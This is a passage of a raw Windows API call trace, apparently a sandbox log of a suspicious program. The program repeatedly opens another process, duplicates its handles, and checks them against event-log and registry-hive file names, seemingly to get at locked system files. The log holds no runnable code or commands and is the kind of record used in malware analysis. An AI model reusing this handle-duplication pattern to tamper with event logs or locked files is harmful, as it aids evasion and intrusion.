(hObject=0x1e8) returned 1 [0164.096] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.096] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.096] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.097] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.098] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.098] CloseHandle (hObject=0x1e4) returned 1 [0164.098] CloseHandle (hObject=0x194) returned 1 [0164.098] CloseHandle (hObject=0x1e8) returned 1 [0164.098] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.098] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.099] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.099] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.100] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.100] CloseHandle (hObject=0x1e4) returned 1 [0164.101] CloseHandle (hObject=0x194) returned 1 [0164.101] CloseHandle (hObject=0x1e8) returned 1 [0164.101] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.101] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.101] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.102] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.103] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.103] CloseHandle (hObject=0x1e4) returned 1 [0164.103] _wcsicmp (_Str1="\\System.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.103] CloseHandle (hObject=0x194) returned 1 [0164.103] CloseHandle (hObject=0x1e8) returned 1 [0164.103] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.103] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.103] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.104] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.104] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.104] CloseHandle (hObject=0x1e4) returned 1 [0164.104] _wcsicmp (_Str1="\\Application.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.105] CloseHandle (hObject=0x194) returned 1 [0164.105] CloseHandle (hObject=0x1e8) returned 1 [0164.105] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.105] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.105] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.105] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.106] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.106] CloseHandle (hObject=0x1e4) returned 1 [0164.106] _wcsicmp (_Str1="\\Internet Explorer.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0164.106] CloseHandle (hObject=0x194) returned 1 [0164.106] CloseHandle (hObject=0x1e8) returned 1 [0164.107] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.107] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x204, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.107] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.107] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.108] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.109] CloseHandle (hObject=0x1e4) returned 1 [0164.109] _wcsicmp (_Str1="\\Security.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.109] CloseHandle (hObject=0x194) returned 1 [0164.109] CloseHandle (hObject=0x1e8) returned 1 [0164.109] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.109] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x210, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.109] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.110] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.111] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.111] CloseHandle (hObject=0x1e4) returned 1 [0164.111] _wcsicmp (_Str1="\\Windows PowerShell.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.111] CloseHandle (hObject=0x194) returned 1 [0164.111] CloseHandle (hObject=0x1e8) returned 1 [0164.111] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.111] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x214, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.111] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.112] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.112] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.113] CloseHandle (hObject=0x1e4) returned 1 [0164.113] _wcsicmp (_Str1="\\OAlerts.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 1 [0164.113] CloseHandle (hObject=0x194) returned 1 [0164.113] CloseHandle (hObject=0x1e8) returned 1 [0164.113] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.113] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x218, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.113] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.114] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.114] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.115] CloseHandle (hObject=0x1e4) returned 1 [0164.115] _wcsicmp (_Str1="\\Media Center.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.115] CloseHandle (hObject=0x194) returned 1 [0164.115] CloseHandle (hObject=0x1e8) returned 1 [0164.115] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.115] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.115] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.116] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.116] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.117] CloseHandle (hObject=0x1e4) returned 1 [0164.117] _wcsicmp (_Str1="\\Key Management Service.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -3 [0164.117] CloseHandle (hObject=0x194) returned 1 [0164.117] CloseHandle (hObject=0x1e8) returned 1 [0164.117] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.117] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x224, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.117] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.118] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.118] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.119] CloseHandle (hObject=0x1e4) returned 1 [0164.119] _wcsicmp (_Str1="\\HardwareEvents.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -6 [0164.119] CloseHandle (hObject=0x194) returned 1 [0164.119] CloseHandle (hObject=0x1e8) returned 1 [0164.119] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.119] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.119] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.120] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.120] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.120] CloseHandle (hObject=0x1e4) returned 1 [0164.120] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.120] CloseHandle (hObject=0x194) returned 1 [0164.121] CloseHandle (hObject=0x1e8) returned 1 [0164.121] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.121] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x22c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.121] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.121] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.122] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.122] CloseHandle (hObject=0x1e4) returned 1 [0164.122] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.122] CloseHandle (hObject=0x194) returned 1 [0164.122] CloseHandle (hObject=0x1e8) returned 1 [0164.122] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.123] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.123] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.123] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.124] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.124] CloseHandle (hObject=0x1e4) returned 1 [0164.124] CloseHandle (hObject=0x194) returned 1 [0164.124] CloseHandle (hObject=0x1e8) returned 1 [0164.124] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.124] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.124] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.125] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.126] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.126] CloseHandle (hObject=0x1e4) returned 1 [0164.126] CloseHandle (hObject=0x194) returned 1 [0164.126] CloseHandle (hObject=0x1e8) returned 1 [0164.126] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.126] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x314, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.126] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.127] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.128] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.128] CloseHandle (hObject=0x1e4) returned 1 [0164.128] CloseHandle (hObject=0x194) returned 1 [0164.128] CloseHandle (hObject=0x1e8) returned 1 [0164.128] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.128] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x318, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.128] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.129] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.130] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.130] CloseHandle (hObject=0x1e4) returned 1 [0164.130] CloseHandle (hObject=0x194) returned 1 [0164.130] CloseHandle (hObject=0x1e8) returned 1 [0164.130] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.130] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x40c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.130] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.131] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.132] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.132] CloseHandle (hObject=0x1e4) returned 1 [0164.132] CloseHandle (hObject=0x194) returned 1 [0164.132] CloseHandle (hObject=0x1e8) returned 1 [0164.132] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.132] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x438, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.132] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.133] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.134] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.134] CloseHandle (hObject=0x1e4) returned 1 [0164.134] CloseHandle (hObject=0x194) returned 1 [0164.134] CloseHandle (hObject=0x1e8) returned 1 [0164.134] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.134] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x474, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.134] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.135] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.136] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.136] CloseHandle (hObject=0x1e4) returned 1 [0164.136] _wcsicmp (_Str1="\\Microsoft-Windows-ReadyBoost%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.136] CloseHandle (hObject=0x194) returned 1 [0164.136] CloseHandle (hObject=0x1e8) returned 1 [0164.136] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.136] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.136] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.137] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.137] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.138] CloseHandle (hObject=0x1e4) returned 1 [0164.138] _wcsicmp (_Str1="\\Microsoft-Windows-GroupPolicy%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.138] CloseHandle (hObject=0x194) returned 1 [0164.138] CloseHandle (hObject=0x1e8) returned 1 [0164.138] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.138] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.138] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.139] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.140] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.140] CloseHandle (hObject=0x1e4) returned 1 [0164.140] _wcsicmp (_Str1="\\Microsoft-Windows-Dhcp-Client%4Admin.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.140] CloseHandle (hObject=0x194) returned 1 [0164.140] CloseHandle (hObject=0x1e8) returned 1 [0164.140] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.140] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.140] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.141] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.142] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.142] CloseHandle (hObject=0x1e4) returned 1 [0164.142] _wcsicmp (_Str1="\\Microsoft-Windows-OfflineFiles%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.142] CloseHandle (hObject=0x194) returned 1 [0164.142] CloseHandle (hObject=0x1e8) returned 1 [0164.142] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.142] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.142] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.142] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.143] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.143] CloseHandle (hObject=0x1e4) returned 1 [0164.143] _wcsicmp (_Str1="\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.143] CloseHandle (hObject=0x194) returned 1 [0164.143] CloseHandle (hObject=0x1e8) returned 1 [0164.143] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.144] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.144] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.144] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.145] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.145] CloseHandle (hObject=0x1e4) returned 1 [0164.145] _wcsicmp (_Str1="\\Microsoft-Windows-Winlogon%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.145] CloseHandle (hObject=0x194) returned 1 [0164.145] CloseHandle (hObject=0x1e8) returned 1 [0164.145] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.145] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.145] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 